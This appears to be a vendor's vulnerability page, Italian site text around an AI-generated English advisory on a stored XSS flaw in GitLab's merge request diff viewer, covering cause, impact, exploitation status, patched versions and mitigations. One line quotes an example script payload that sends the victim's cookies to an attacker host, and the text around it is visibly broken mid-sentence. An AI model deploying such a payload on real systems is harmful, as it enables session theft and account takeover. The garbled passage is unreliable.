
PEACH
Un framework di isolamento del tenant
CVE-2026-84739 is a stored Cross-Site Scripting (XSS) vulnerability in GitLab CE/EE affecting all versions from 13.11 through 19.2.6, 19.3.0 through 19.3.2, and 19.4.0. The flaw exists due to improper sanitization of path components in the merge request diff viewer, allowing an authenticated user to execute arbitrary JavaScript in another user's browser session under certain conditions. It was published on September 29, 2026, with patches released the same day. The vulnerability carries a CVSS v3.1 base score of 8.7 (High) (GitHub Advisory, GitLab Patch Release).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Specifically, path components submitted as part of merge request diffs are not properly sanitized before being rendered in the diff viewer, enabling injection of malicious JavaScript. An authenticated attacker with at least Developer-level access (sufficient to create merge requests) can craft a repository with a maliciously named file path containing JavaScript payloads; when a victim user views the merge request diff, the script executes in their browser session. Exploitation requires user interaction (the victim must view the diff) but no elevated privileges beyond basic authentication (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim user's browser session, enabling theft of session tokens, account impersonation, and unauthorized actions performed on behalf of the victim within the GitLab instance. Both confidentiality and integrity are rated High in the CVSS scoring, with scope marked as Changed — meaning the impact extends beyond the attacker's own session to affect other users' sessions. Availability is not directly impacted, but session hijacking could lead to broader compromise of the GitLab environment, including access to private repositories, CI/CD pipelines, and sensitive project data (GitHub Advisory, GitLab Patch Release).
As of the disclosure date, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.362% (28th percentile), indicating a relatively low near-term exploitation probability. The vulnerability is not automatable (requires user interaction), which reduces mass-exploitation risk, though targeted attacks against high-value GitLab users remain plausible.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) that exploits the unsanitized path rendering in the diff viewer.<, >, ", ', script) in repository commit history.GitLab has released patched versions 19.2.7, 19.3.3, and 19.4.1 addressing this vulnerability; upgrading to one of these versions is the recommended remediation (GitLab Patch Release). For organizations unable to patch immediately, restricting access to merge request diff viewing or temporarily disabling the merge request diff viewer can reduce exposure. Additionally, enforcing strict Content Security Policy (CSP) headers on the GitLab instance may limit the impact of XSS payloads. GitLab.com (SaaS) users are automatically protected as the platform is updated by GitLab.
The patch release was covered by several security news outlets including SecurityOnline, CyberSecurityNews, Heise, and Cryptika, primarily in the context of a broader GitLab critical patch release that also addressed other high-severity vulnerabilities (GitLab Patch Release). Community discussion on Bluesky and security aggregators noted the vulnerability alongside more severe RCE issues in the same release cycle, which drew comparatively more attention. No notable individual researcher commentary specific to CVE-2026-84739 has been identified beyond the HackerOne report submission.
Fonte: Questo report è stato generato utilizzando l'intelligenza artificiale
Valutazione gratuita delle vulnerabilità
Valuta le tue pratiche di sicurezza cloud in 9 domini di sicurezza per confrontare il tuo livello di rischio e identificare le lacune nelle tue difese.
Richiedi una demo personalizzata
"La migliore esperienza utente che abbia mai visto offre piena visibilità ai carichi di lavoro cloud."
"Wiz fornisce un unico pannello di controllo per vedere cosa sta succedendo nei nostri ambienti cloud."
"Sappiamo che se Wiz identifica qualcosa come critico, in realtà lo è."